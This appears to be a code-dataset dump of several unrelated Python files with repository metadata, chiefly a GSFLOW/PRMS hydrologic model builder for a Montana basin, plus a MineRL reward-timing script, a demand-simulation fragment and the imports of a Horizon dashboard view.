self._max_mean = run_parameters.get('customer_max_mean',
self._DEFAULT_MAX_MEAN)
self._DEFAULT_NEWSVENDOR_CUSTOMER = 'Customer'
def get_name(self):
return 'order_generator'
def reset(self, context, state):
self._asin_list = context['asin_list']
def compute_actions(self, state):
# There are two modes of operation: (a) simulates the ASIN selection itself, (b) simulates
# for a requested set of ASINs. This is defined in the context.
actions = []
for asin in self._asin_list:
# Generate demand from poisson distribution with mean in range [0, max]
mean_demand = self._rng.rand() * self._max_mean
demand_realization = round(max(1, self._rng.poisson(mean_demand)))
action = {
'type': 'customer_order',
'asin': asin,
'origin': None,
'destination': self._DEFAULT_NEWSVENDOR_CUSTOMER,
'quantity': demand_realization,
'schedule': state['clock']
}
logger.debug("{} bought {} units of {}.".format(
self._DEFAULT_NEWSVENDOR_CUSTOMER, demand_realization, asin))
actions.append(action)
return actions
| 35.68
| 98
| 0.623318
| 198
| 1,784
| 5.353535
| 0.469697
| 0.039623
| 0.059434
| 0.082075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003152
| 0.288677
| 1,784
| 49
| 99
| 36.408163
| 0.832151
| 0.178812
| 0
| 0
| 0
| 0
| 0.102406
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0.029412
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ab0ef6affb1be12f6d367b89eb7c08b1fd954b
| 2,340
|
py
|
Python
|
time_to_get_rewards.py
|
GJuceviciute/MineRL-2020
|
095ca6598b6a58120dcc5dcee05c995fc58d540a
|
[
"MIT"
] | 4
|
2021-03-23T21:12:57.000Z
|
2021-07-03T16:22:01.000Z
|
time_to_get_rewards.py
|
GJuceviciute/MineRL-2020
|
095ca6598b6a58120dcc5dcee05c995fc58d540a
|
[
"MIT"
] | null | null | null |
time_to_get_rewards.py
|
GJuceviciute/MineRL-2020
|
095ca6598b6a58120dcc5dcee05c995fc58d540a
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
from utils import MINERL_DATA_ROOT, CUMULATIVE_REWARDS
import sys
import pandas
def time_to_rewards(data_set, trajectory):
"""
Takes a data_set and a trajectory, and returns times (in ticks) to achieve each cumulative reward (from the last
cumulative reward, not from start).
:param data_set: data set name (for example: 'MineRLObtainDiamond-v0')
:param trajectory: trajectory path
:return: a list of times to achieve cumulative rewards
"""
doc = os.path.join(MINERL_DATA_ROOT, data_set, trajectory, 'rendered.npz')
f = np.load(doc)
rewards = list(f['reward'])
times = []
c = 0
sum_rew = 0
for i in range(len(rewards)):
while rewards[i] + sum_rew >= CUMULATIVE_REWARDS[c]:
times.append(i)
c += 1
sum_rew += rewards[i]
time_periods = [times[i] - times[i - 1] for i in range(1, len(times))]
return time_periods
def main():
if len(sys.argv) > 1:
data_set = sys.argv[1]
else:
data_set = 'MineRLObtainDiamond-v0'
path = os.path.join(MINERL_DATA_ROOT, data_set)
trajectories = os.listdir(path)
trajectories.sort()
trajectory_times = []
for trajectory in trajectories:
time_periods = time_to_rewards(data_set, trajectory)
trajectory_times.append(time_periods)
reward_times = [[] for _ in range(len(CUMULATIVE_REWARDS[1:-1]))]
for times in trajectory_times:
for i in range(len(times)):
reward_times[i].append(times[i])
reward_times = [sorted(i) for i in reward_times]
mean = [0] + [sum(i) // len(i) for i in reward_times if len(i) > 0]
median = [0] + [i[len(i) // 2] for i in reward_times if len(i) > 0]
counts = [len(trajectories)] + [len(i) for i in reward_times if len(i) > 0]
d = {'mean': {}, 'median': {}, 'counts': {}}
for i in range(len(mean)):
d['mean'][CUMULATIVE_REWARDS[i]] = mean[i]
d['median'][CUMULATIVE_REWARDS[i]] = median[i]
d['counts'][CUMULATIVE_REWARDS[i]] = counts[i]
print('\ntimes to achieve cumulative rewards(in ticks) and number of trajectories that achieve them')
print(pandas.DataFrame.from_dict(d, orient='index').to_string())
if __name__ == "__main__":
main()
| 34.925373
| 117
| 0.624359
| 330
| 2,340
| 4.269697
| 0.251515
| 0.044713
| 0.034067
| 0.031228
| 0.185947
| 0.156139
| 0.100781
| 0.100781
| 0.056778
| 0.039745
| 0
| 0.009692
| 0.250427
| 2,340
| 66
| 118
| 35.454545
| 0.793615
| 0.132051
| 0
| 0
| 0
| 0
| 0.091568
| 0.011381
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.104167
| 0
| 0.166667
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9abcbc9f24259365718e0b6fb124db1e9b1a358
| 30,988
|
py
|
Python
|
gsflow_prep/gsflow_model_prep.py
|
dgketchum/MT_RSense
|
0048c1ccb1ff6e48bd630edd477f95ae29fea06d
|
[
"Apache-2.0"
] | null | null | null |
gsflow_prep/gsflow_model_prep.py
|
dgketchum/MT_RSense
|
0048c1ccb1ff6e48bd630edd477f95ae29fea06d
|
[
"Apache-2.0"
] | null | null | null |
gsflow_prep/gsflow_model_prep.py
|
dgketchum/MT_RSense
|
0048c1ccb1ff6e48bd630edd477f95ae29fea06d
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
from copy import copy
from subprocess import call, Popen, PIPE, STDOUT
import time
import numpy as np
import pandas as pd
from pyproj import Transformer
import rasterio
import fiona
from affine import Affine
from shapely.geometry import shape
from scipy.ndimage.morphology import binary_erosion
from pandas.plotting import register_matplotlib_converters
import matplotlib
import matplotlib.pyplot as plt
import flopy
from flopy.utils import GridIntersect
import richdem as rd
from gsflow.builder import GenerateFishnet, FlowAccumulation, PrmsBuilder, ControlFileBuilder
from gsflow.builder.builder_defaults import ControlFileDefaults
from gsflow.builder import builder_utils as bu
from gsflow.prms.prms_parameter import ParameterRecord
from gsflow.prms import PrmsData, PrmsParameters
from gsflow.control import ControlFile
from gsflow.output import StatVar
from model_config import PRMSConfig
from gsflow_prep import PRMS_NOT_REQ
from datafile import write_basin_datafile
register_matplotlib_converters()
pd.options.mode.chained_assignment = None
# RichDEM flow-direction coordinate system:
# 234
# 105
# 876
d8_map = {5: 1, 6: 2, 7: 4, 8: 8, 1: 16, 2: 32, 3: 64, 4: 128}
class StandardPrmsBuild(object):
def __init__(self, config):
self.cfg = PRMSConfig(config)
self.res = float(self.cfg.hru_cellsize)
self.proj_name_res = '{}_{}'.format(self.cfg.project_name,
self.cfg.hru_cellsize)
for folder in ['hru_folder', 'parameter_folder', 'control_folder', 'data_folder', 'output_folder']:
folder_path = os.path.join(self.cfg.project_folder,
self.proj_name_res,
getattr(self.cfg, folder))
setattr(self.cfg, folder, folder_path)
if not os.path.isdir(folder_path):
os.makedirs(folder_path, exist_ok=True)
self.parameters = None
self.control = None
self.data = None
self.zeros = None
with fiona.open(self.cfg.study_area_path, 'r') as src:
self.raster_meta = src.meta
self.basin_geo = [shape(f['geometry']) for f in src][0]
self.prj = self.cfg.study_area_path.replace('.shp', '.prj')
self.control_file = os.path.join(self.cfg.control_folder,
'{}.control'.format(self.proj_name_res))
self.parameter_file = os.path.join(self.cfg.parameter_folder,
'{}.params'.format(self.proj_name_res))
self.data_file = os.path.join(self.cfg.data_folder, '{}.data'.format(self.proj_name_res))
def write_parameter_file(self):
builder = PrmsBuilder(
self.streams,
self.cascades,
self.modelgrid,
self.dem.ravel(),
hru_type=self.hru_lakeless.ravel(),
hru_subbasin=self.hru_lakeless.ravel())
self.parameters = builder.build()
self.parameters.hru_lat = self.lat
self.parameters.hru_lon = self.lon
self.parameters.add_record_object(ParameterRecord('hru_x',
np.array(self.modelgrid.xcellcenters.ravel(),
dtype=float).ravel(),
dimensions=[['nhru', len(self.lon)]],
datatype=2))
self.parameters.add_record_object(ParameterRecord('hru_y',
np.array(self.modelgrid.ycellcenters.ravel(),
dtype=float).ravel(),
dimensions=[['nhru', len(self.lat)]],
datatype=2))
areas = np.ones_like(self.lat) * self.hru_area
self.parameters.add_record_object(ParameterRecord('hru_area',
np.array(areas, dtype=float).ravel(),
dimensions=[['nhru', len(self.lat)]],
datatype=2))
# self.build_lakes()
self._build_veg_params()
self._build_soil_params()
[self.parameters.add_record_object(rec) for rec in self.data_params]
[self.parameters.remove_record(rec) for rec in PRMS_NOT_REQ]
self.parameters.write(self.parameter_file)
def write_control_file(self):
controlbuild = ControlFileBuilder(ControlFileDefaults())
self.control = controlbuild.build(name='{}.control'.format(self.proj_name_res),
parameter_obj=self.parameters)
self.control.model_mode = ['PRMS']
self.control.executable_desc = ['PRMS Model']
self.control.executable_model = [self.cfg.prms_exe]
self.control.cascadegw_flag = [0]
self.control.et_module = ['potet_jh']
self.control.precip_module = ['xyz_dist']
self.control.temp_module = ['xyz_dist']
self.control.solrad_module = ['ccsolrad']
self.control.rpt_days = [7]
self.control.snarea_curve_flag = [0]
self.control.soilzone_aet_flag = [0]
self.control.srunoff_module = ['srunoff_smidx']
# 0: standard; 1: SI/metric
units = 0
self.control.add_record('elev_units', [units])
self.control.add_record('precip_units', [units])
self.control.add_record('temp_units', [units])
self.control.add_record('runoff_units', [units])
self.control.start_time = [int(d) for d in self.cfg.start_time.split(',')] + [0, 0, 0]
self.control.subbasin_flag = [0]
self.control.transp_module = ['transp_tindex']
self.control.csv_output_file = [os.path.join(self.cfg.output_folder, 'output.csv')]
self.control.param_file = [self.parameter_file]
self.control.subbasin_flag = [0, ]
self.control.parameter_check_flag = [0, ]
self.control.add_record('end_time', [int(d) for d in self.cfg.end_time.split(',')] + [0, 0, 0])
self.control.add_record('model_output_file', [os.path.join(self.cfg.output_folder, 'output.model')],
datatype=4)
self.control.add_record('var_init_file', [os.path.join(self.cfg.output_folder, 'init.csv')],
datatype=4)
self.control.add_record('data_file', [self.data_file], datatype=4)
stat_vars = ['runoff',
'basin_tmin',
'basin_tmax',
'basin_ppt',
'basin_rain',
'basin_snow',
'basin_potsw',
'basin_potet',
'basin_net_ppt',
'basin_intcp_stor',
'basin_pweqv',
'basin_snowmelt',
'basin_snowcov',
'basin_sroff',
'basin_hortonian',
'basin_infil',
'basin_soil_moist',
'basin_recharge',
'basin_actet',
'basin_gwstor',
'basin_gwflow',
'basin_gwsink',
'basin_cfs',
'basin_ssflow',
'basin_imperv_stor',
'basin_lake_stor',
'basin_ssstor']
self.control.add_record('statsON_OFF', values=[1], datatype=1)
self.control.add_record('nstatVars', values=[len(stat_vars)], datatype=1)
self.control.add_record('statVar_element', values=['1' for _ in stat_vars], datatype=4)
self.control.add_record('statVar_names', values=stat_vars, datatype=4)
self.control.add_record('stat_var_file', [os.path.join(self.cfg.output_folder, 'statvar.out')],
datatype=4)
disp_vars = [('basin_cfs', '1'),
('runoff', '1'),
('basin_gwflow', '2'),
('basin_sroff', '2'),
('basin_ssflow', '2'),
('basin_actet', '3'),
('basin_potet', '3'),
('basin_perv_et', '3'),
('basin_pweqv', '4'),
('basin_snow', '4'),
('basin_snowdepth', '4'),
('basin_snowmelt', '4')]
self.control.add_record('dispVar_plot', values=[e[1] for e in disp_vars], datatype=4)
self.control.add_record('statVar_names', values=stat_vars, datatype=4)
self.control.add_record('dispVar_element', values=['1' for _ in disp_vars], datatype=4)
self.control.add_record('gwr_swale_flag', [1])
# remove gsflow control objects
self.control.remove_record('gsflow_output_file')
self.control.write(self.control_file)
def write_datafile(self, units='metric'):
self.nmonths = 12
ghcn = self.cfg.prms_data_ghcn
stations = self.cfg.prms_data_stations
gages = self.cfg.prms_data_gages
with open(stations, 'r') as js:
sta_meta = json.load(js)
sta_iter = sorted([(v['zone'], v) for k, v in sta_meta.items()], key=lambda x: x[0])
tsta_elev, tsta_nuse, tsta_x, tsta_y, psta_elev = [], [], [], [], []
for _, val in sta_iter:
if units != 'metric':
elev = val['elev'] / 0.3048
else:
elev = val['elev']
tsta_elev.append(elev)
tsta_nuse.append(1)
tsta_x.append(val['proj_coords'][1])
tsta_y.append(val['proj_coords'][0])
psta_elev.append(elev)
self.data_params = [ParameterRecord('nrain', values=[len(tsta_x)], datatype=1),
ParameterRecord('ntemp', values=[len(tsta_x)], datatype=1),
ParameterRecord('psta_elev', np.array(psta_elev, dtype=float).ravel(),
dimensions=[['nrain', len(psta_elev)]], datatype=2),
ParameterRecord('psta_nuse', np.array(tsta_nuse, dtype=int).ravel(),
dimensions=[['nrain', len(tsta_nuse)]], datatype=1),
ParameterRecord(name='ndist_psta', values=[len(tsta_nuse), ], datatype=1),
ParameterRecord('psta_x', np.array(tsta_x, dtype=float).ravel(),
dimensions=[['nrain', len(tsta_x)]], datatype=2),
ParameterRecord('psta_y', np.array(tsta_y, dtype=float).ravel(),
dimensions=[['nrain', len(tsta_y)]], datatype=2),
ParameterRecord('tsta_elev', np.array(tsta_elev, dtype=float).ravel(),
dimensions=[['ntemp', len(tsta_elev)]], datatype=2),
ParameterRecord('tsta_nuse', np.array(tsta_nuse, dtype=int).ravel(),
dimensions=[['ntemp', len(tsta_nuse)]], datatype=1),
ParameterRecord(name='ndist_tsta', values=[len(tsta_nuse), ], datatype=1),
ParameterRecord('tsta_x', np.array(tsta_x, dtype=float).ravel(),
dimensions=[['ntemp', len(tsta_x)]], datatype=2),
ParameterRecord('tsta_y', np.array(tsta_y, dtype=float).ravel(),
dimensions=[['ntemp', len(tsta_y)]], datatype=2),
bu.tmax_adj(self.nhru),
bu.tmin_adj(self.nhru),
ParameterRecord(name='nobs', values=[1, ], datatype=1),
]
outlet_sta = self.modelgrid.intersect(self.pour_pt[0][0], self.pour_pt[0][1])
outlet_sta = self.modelgrid.get_node([(0,) + outlet_sta])
self.data_params.append(ParameterRecord('outlet_sta',
values=[outlet_sta[0] + 1, ],
dimensions=[['one', 1]],
datatype=1))
if units == 'metric':
allrain_max = np.ones((self.nhru * self.nmonths)) * 3.3
tmax_allrain = np.ones((self.nhru * self.nmonths)) * 3.3
tmax_allsnow = np.ones((self.nhru * self.nmonths)) * 0.0
else:
allrain_max = np.ones((self.nhru * self.nmonths)) * 38.0
tmax_allrain = np.ones((self.nhru * self.nmonths)) * 38.0
tmax_allsnow = np.ones((self.nhru * self.nmonths)) * 32.0
self.data_params.append(ParameterRecord('tmax_allrain_sta', allrain_max,
dimensions=[['nhru', self.nhru], ['nmonths', self.nmonths]],
datatype=2))
self.data_params.append(ParameterRecord('tmax_allrain', tmax_allrain,
dimensions=[['nhru', self.nhru], ['nmonths', self.nmonths]],
datatype=2))
self.data_params.append(ParameterRecord('tmax_allsnow', tmax_allsnow,
dimensions=[['nhru', self.nhru], ['nmonths', self.nmonths]],
datatype=2))
self.data_params.append(ParameterRecord('snowpack_init',
np.ones_like(self.ksat).ravel(),
dimensions=[['nhru', self.nhru]],
datatype=2))
if not os.path.isfile(self.data_file):
write_basin_datafile(station_json=stations,
gage_json=gages,
ghcn_data=ghcn,
out_csv=None,
data_file=self.data_file,
units=units)
self.data = PrmsData.load_from_file(self.data_file)
def build_model_files(self):
self._build_grid()
self.write_datafile(units='standard')
self.write_parameter_file()
self.write_control_file()
def write_raster_params(self, name, values=None):
out_dir = os.path.join(self.cfg.raster_folder, 'resamples', self.cfg.hru_cellsize)
if not isinstance(values, np.ndarray):
values = self.parameters.get_values(name).reshape((self.modelgrid.nrow, self.modelgrid.ncol))
_file = os.path.join(out_dir, '{}.tif'.format(name))
with rasterio.open(_file, 'w', **self.raster_meta) as dst:
dst.write(values, 1)
def _build_grid(self):
with fiona.open(self.cfg.study_area_path, 'r') as domain:
geo = [f['geometry'] for f in domain][0]
geo = shape(geo)
self.bounds = geo.bounds
self.modelgrid = GenerateFishnet(bbox=self.cfg.elevation,
xcellsize=float(self.cfg.hru_cellsize),
ycellsize=float(self.cfg.hru_cellsize))
self.fishnet_file = os.path.join(self.cfg.hru_folder, 'fishnet.shp')
self.modelgrid.write_shapefile(self.fishnet_file, prj=self.prj)
self._prepare_rasters()
x = self.modelgrid.xcellcenters.ravel()
y = self.modelgrid.ycellcenters.ravel()
self.nhru = (x * y).size
self.hru_area = (float(self.cfg.hru_cellsize) ** 2) * 0.000247105
trans = Transformer.from_proj('epsg:{}'.format(5071), 'epsg:4326', always_xy=True)
self.lon, self.lat = trans.transform(x, y)
self.zeros = np.zeros((self.modelgrid.nrow, self.modelgrid.ncol))
self.nnodes = self.zeros.size
self._build_domain_params()
self._build_terrain_params(mode='richdem')
def _build_terrain_params(self, mode='pygsflow'):
"""This method computes flow accumulation/direction rasters for both
RichDEM and PyGSFLOW. RichDEM seems to fill depressions more effectively and is fast."""
self.dem = rd.LoadGDAL(self.cfg.elevation, no_data=0.0)
if np.any(self.dem == 0.0):
for r in range(self.dem.shape[0]):
d = self.dem[r, :].ravel()
idx = np.arange(len(d))
self.dem[r, :] = np.interp(idx, idx[d > 0.0], d[d > 0.0])
if mode == 'richdem':
# RichDEM flow accumulation and direction
rd.FillDepressions(self.dem, epsilon=0.0001, in_place=True)
self.dem = rd.rdarray(self.dem, no_data=0, dtype=float)
rd_flow_accumulation = rd.FlowAccumulation(self.dem, method='D8')
props = rd.FlowProportions(dem=self.dem, method='D8')
# remap directions to pygsflow nomenclature
dirs = np.ones_like(rd_flow_accumulation)
for i in range(1, 9):
dirs = np.where(props[:, :, i] == 1, np.ones_like(dirs) * i, dirs)
rd_flow_directions = copy(dirs)
for k, v in d8_map.items():
rd_flow_directions[dirs == k] = v
# manually flow corners and edges inward
rd_flow_directions[0, 0] = 2
rd_flow_directions[0, -1] = 8
rd_flow_directions[-1, 0] = 128
rd_flow_directions[-1, -1] = 32
rd_flow_directions[0, 1:-1] = 4
rd_flow_directions[1:-1, 0] = 1
rd_flow_directions[1:-1, -1] = 16
rd_flow_directions[-1, 1:-1] = 64
self.flow_direction = rd_flow_directions
self.flow_accumulation = rd_flow_accumulation
elif mode == 'pygsflow':
# pygsflow flow accumulation and direction
fa = FlowAccumulation(self.dem,
self.modelgrid.xcellcenters,
self.modelgrid.ycellcenters,
verbose=False)
self.flow_direction = fa.flow_directions(dijkstra=True, breach=0.001)
self.flow_accumulation = fa.flow_accumulation()
else:
raise NotImplementedError('Must choose between "pygsflow" and "richdem" for '
'flow calculations')
fa = FlowAccumulation(
self.dem,
self.modelgrid.xcellcenters,
self.modelgrid.ycellcenters,
hru_type=self.hru_lakeless,
flow_dir_array=self.flow_direction,
verbose=False)
self.watershed = fa.define_watershed(self.pour_pt,
self.modelgrid,
fmt='xy')
self.streams = fa.make_streams(self.flow_direction,
self.flow_accumulation,
threshold=100,
min_stream_len=10)
self.cascades = fa.get_cascades(streams=self.streams,
pour_point=self.pour_pt, fmt='xy',
modelgrid=self.modelgrid)
self.hru_aspect = bu.d8_to_hru_aspect(self.flow_direction)
self.hru_slope = bu.d8_to_hru_slope(self.flow_direction,
self.dem,
self.modelgrid.xcellcenters,
self.modelgrid.ycellcenters)
def _build_domain_params(self):
ix = GridIntersect(self.modelgrid, method='vertex', rtree=True)
shape_input = [('outlet', 'model_outlet_path'),
('lake_id', 'lake_path'),
('hru_type', 'study_area_path')]
for param, path in shape_input:
shp_file = getattr(self.cfg, path)
feats = features(shp_file)
data = copy(self.zeros)
for i, f in enumerate(feats, start=1):
geo = shape(f['geometry'])
idx = ix.intersects(geo)
for x in idx:
data[x[0]] = i
outfile = os.path.join(self.cfg.hru_folder, '{}.txt'.format(param))
if param == 'outlet':
setattr(self, 'pour_pt', [[geo.x, geo.y]])
if param == 'hru_type':
erode = binary_erosion(data)
border = erode < data
setattr(self, 'border', border)
lakeless = np.where(border, self.zeros + 3, data)
setattr(self, 'hru_lakeless', lakeless)
data = np.where(self.lake_id > 0, self.zeros + 2, data)
setattr(self, param, data)
np.savetxt(outfile, data, delimiter=' ')
def _build_lakes(self):
lakes = bu.lake_hru_id(self.lake_id)
nlake = ParameterRecord(
name='nlake', values=[np.unique(self.lake_id)], datatype=1, file_name=None
)
nlake_hrus = ParameterRecord(
name='nlake_hrus', values=[np.count_nonzero(self.lake_id)], datatype=1, file_name=None
)
[self.parameters.add_record_object(l) for l in [lakes, nlake, nlake_hrus]]
def _build_veg_params(self):
self._prepare_lookups()
covtype = bu.covtype(self.landfire_type, self.covtype_lut)
covden_sum = bu.covden_sum(self.landfire_cover, self.covdensum_lut)
covden_win = bu.covden_win(covtype.values, self.covdenwin_lut)
rad_trncf = bu.rad_trncf(covden_win.values)
snow_intcp = bu.snow_intcp(self.landfire_type, self.snow_intcp_lut)
srain_intcp = bu.srain_intcp(self.landfire_type, self.srain_intcp_lut)
wrain_intcp = bu.wrain_intcp(self.landfire_type, self.snow_intcp_lut)
vars_ = [covtype, covden_sum, covden_win, rad_trncf, snow_intcp, srain_intcp,
wrain_intcp]
for v in vars_:
self.parameters.add_record_object(v)
self.root_depth = bu.root_depth(self.landfire_type, self.rtdepth_lut)
def _build_soil_params(self):
cellsize = int(self.cfg.hru_cellsize)
soil_type = bu.soil_type(self.clay, self.sand)
# awc meters to inches
self.awc = self.awc * 1000 / 25.4
soil_moist_max = bu.soil_moist_max(self.awc, self.root_depth)
soil_moist_init = bu.soil_moist_init(soil_moist_max.values)
soil_rech_max = bu.soil_rech_max(self.awc, self.root_depth)
soil_rech_init = bu.soil_rech_init(soil_rech_max.values)
# ksat mircrometer/sec to inches/day
self.ksat = self.ksat * 3.4 / 1000
ssr2gw_rate = bu.ssr2gw_rate(self.ksat, self.sand, soil_moist_max.values)
ssr2gw_sq = bu.ssr2gw_exp(self.nnodes)
slowcoef_lin = bu.slowcoef_lin(self.ksat, self.hru_aspect.values, cellsize, cellsize)
slowcoef_sq = bu.slowcoef_sq(self.ksat, self.hru_aspect.values, self.sand,
soil_moist_max.values, cellsize, cellsize)
# parameterize this
sat_threshold = ParameterRecord('sat_threshold',
np.ones_like(self.ksat).ravel(),
dimensions=[['nhru', self.nhru]],
datatype=2)
hru_percent_imperv = bu.hru_percent_imperv(self.nlcd)
hru_percent_imperv.values /= 100
carea_max = bu.carea_max(self.nlcd) / 100
vars_ = [soil_type, soil_moist_max, soil_moist_init, soil_rech_max, soil_rech_init,
ssr2gw_rate, ssr2gw_sq, slowcoef_lin, slowcoef_sq, hru_percent_imperv, carea_max,
self.hru_aspect, self.hru_slope, sat_threshold]
for v in vars_:
self.parameters.add_record_object(v)
def _prepare_rasters(self):
"""gdal warp is > 10x faster for nearest, here, we resample a single raster using nearest, and use
that raster's metadata to resample the rest with gdalwarp"""
_int = ['landfire_cover', 'landfire_type', 'nlcd']
_float = ['elevation', 'sand', 'clay', 'loam', 'awc', 'ksat']
rasters = _int + _float
first = True
modelgrid = GenerateFishnet(self.cfg.elevation, xcellsize=1000, ycellsize=1000)
for raster in rasters:
in_path = getattr(self.cfg, raster)
out_dir = os.path.join(self.cfg.raster_folder, 'resamples', self.cfg.hru_cellsize)
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
out_path = os.path.join(out_dir, '{}.tif'.format(raster))
setattr(self.cfg, raster, out_path)
txt = out_path.replace('.tif', '.txt')
if os.path.exists(out_path) and os.path.exists(txt):
with rasterio.open(out_path, 'r') as src:
a = src.read(1)
if raster in ['sand', 'clay', 'loam', 'ksat', 'awc']:
a /= 100.
if first:
self.raster_meta = src.meta
first = False
setattr(self, raster, a)
continue
if raster in _float:
rsample, _dtype = 'min', 'Float32'
else:
rsample, _dtype = 'nearest', 'UInt16'
if first:
robj = flopy.utils.Raster.load(in_path)
array = robj.resample_to_grid(modelgrid, robj.bands[0], method=rsample, thread_pool=8)
example_raster = os.path.join(out_dir, 'flopy_raster.tif')
self.raster_meta = robj._meta
sa = copy(self.raster_meta['transform'])
transform = Affine(1000., sa[1], sa[2], sa[3], -1000., sa[5])
self.raster_meta.update({'height': array.shape[0],
'width': array.shape[1],
'transform': transform})
with rasterio.open(example_raster, 'w', **self.raster_meta) as ex:
ex.write(array, 1)
first = False
s = time.time()
b = self.bounds
warp = [self.cfg.gdal_warp_exe, in_path, out_path,
'-te', str(b[0]), str(b[1]), str(b[2] + self.res), str(b[3]),
'-ts', str(array.shape[1]), str(array.shape[0]),
'-multi', '-wo', '-wo NUM_THREADS=8',
'-ot', _dtype, '-r', rsample,
'-dstnodata', '0', '-srcnodata', '0', '-overwrite']
call(warp, stdout=open(os.devnull, 'wb'))
print('gdalwarp {} on {}: {} sec\n'.format(rsample, raster, time.time() - s))
with rasterio.open(out_path, 'r') as src:
a = src.read(1)
if raster in ['sand', 'clay', 'loam', 'ksat', 'awc']:
a /= 100.
if first:
self.raster_meta = src.raster_meta
first = False
setattr(self, raster, a)
np.savetxt(txt, a)
def _prepare_lookups(self):
req_remaps = ['covtype.rmp', 'covdenwin.rmp', 'srain_intcp.rmp',
'snow_intcp.rmp', 'rtdepth.rmp', 'covdensum.rmp',
'wrain_intcp.rmp']
for rmp in req_remaps:
rmp_file = os.path.join(self.cfg.remap_folder, rmp)
lut = bu.build_lut(rmp_file)
_name = '{}_lut'.format(rmp.split('.')[0])
setattr(self, _name, lut)
class MontanaPrmsModel:
def __init__(self, control_file, parameter_file, data_file):
self.control_file = control_file
self.parameter_file = parameter_file
self.data_file = data_file
self.control = ControlFile.load_from_file(control_file)
self.parameters = PrmsParameters.load_from_file(parameter_file)
self.data = PrmsData.load_from_file(data_file)
self.statvar = None
def run_model(self, stdout=None):
for obj_, var_ in [(self.control, 'control'),
(self.parameters, 'parameters'),
(self.data, 'data')]:
if not obj_:
raise TypeError('{} is not set, run "write_{}_file()"'.format(var_, var_))
buff = []
normal_msg = 'normal termination'
report, silent = True, False
argv = [self.control.get_values('executable_model')[0], self.control_file]
model_ws = os.path.dirname(self.control_file)
proc = Popen(argv, stdout=PIPE, stderr=STDOUT, cwd=model_ws)
while True:
line = proc.stdout.readline()
c = line.decode('utf-8')
if c != '':
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip('\r\n')
if not silent:
print('{}'.format(c))
if report:
buff.append(c)
else:
break
if stdout:
with open(stdout, 'w') as fp:
if report:
for line in buff:
fp.write(line + '\n')
return success, buff
def get_statvar(self):
self.statvar = StatVar.load_from_control_object(self.control)
df = self.statvar.stat_df.drop(columns=['Hour', 'Minute', 'Second'])
return df
def features(shp):
with fiona.open(shp, 'r') as src:
return [f for f in src]
def plot_stats(stats):
fig, ax = plt.subplots(figsize=(16, 6))
ax.plot(stats.Date, stats.basin_cfs_1, color='r', linewidth=2.2, label="simulated")
ax.plot(stats.Date, stats.runoff_1, color='b', linewidth=1.5, label="measured")
ax.legend(bbox_to_anchor=(0.25, 0.65))
ax.set_xlabel("Date")
ax.set_ylabel("Streamflow, in cfs")
# ax.set_ylim([0, 2000])
# plt.savefig('/home/dgketchum/Downloads/hydrograph.png')
plt.show()
plt.close()
if __name__ == '__main__':
matplotlib.use('TkAgg')
conf = './model_files/uyws_parameters.ini'
stdout_ = '/media/research/IrrigationGIS/Montana/upper_yellowstone/gsflow_prep/uyws_carter_1000/out.txt'
prms_build = StandardPrmsBuild(conf)
prms_build.build_model_files()
prms = MontanaPrmsModel(prms_build.control_file,
prms_build.parameter_file,
prms_build.data_file)
prms.run_model(stdout_)
stats = prms.get_statvar()
plot_stats(stats)
pass
# ========================= EOF ====================================================================
| 41.932341
| 108
| 0.538499
| 3,479
| 30,988
| 4.586663
| 0.169589
| 0.034468
| 0.014915
| 0.021307
| 0.297111
| 0.243216
| 0.191891
| 0.144137
| 0.110484
| 0.084978
| 0
| 0.016017
| 0.343197
| 30,988
| 738
| 109
| 41.98916
| 0.767995
| 0.027398
| 0
| 0.119643
| 0
| 0
| 0.075126
| 0.004153
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033929
| false
| 0.001786
| 0.051786
| 0
| 0.094643
| 0.003571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9af346978608c3c30e9cd43ee6263e02cda79fe
| 5,695
|
py
|
Python
|
openstack_dashboard/dashboards/admin/rbac_policies/views.py
|
stackhpc/horizon
|
0899f67657e0be62dd9e6be327c63bccb4607dc6
|
[
"Apache-2.0"
] | 930
|
2015-01-04T08:06:03.000Z
|
2022-03-13T18:47:13.000Z
|
openstack_dashboard/dashboards/admin/rbac_policies/views.py
|
stackhpc/horizon
|
0899f67657e0be62dd9e6be327c63bccb4607dc6
|
[
"Apache-2.0"
] | 26
|
2015-02-23T16:37:31.000Z
|
2020-07-02T08:37:41.000Z
|
openstack_dashboard/dashboards/admin/rbac_policies/views.py
|
stackhpc/horizon
|
0899f67657e0be62dd9e6be327c63bccb4607dc6
|
[
"Apache-2.0"
] | 1,040
|
2015-01-01T18:48:28.000Z
|
2022-03-19T08:35:18.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
from django.urls import reverse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
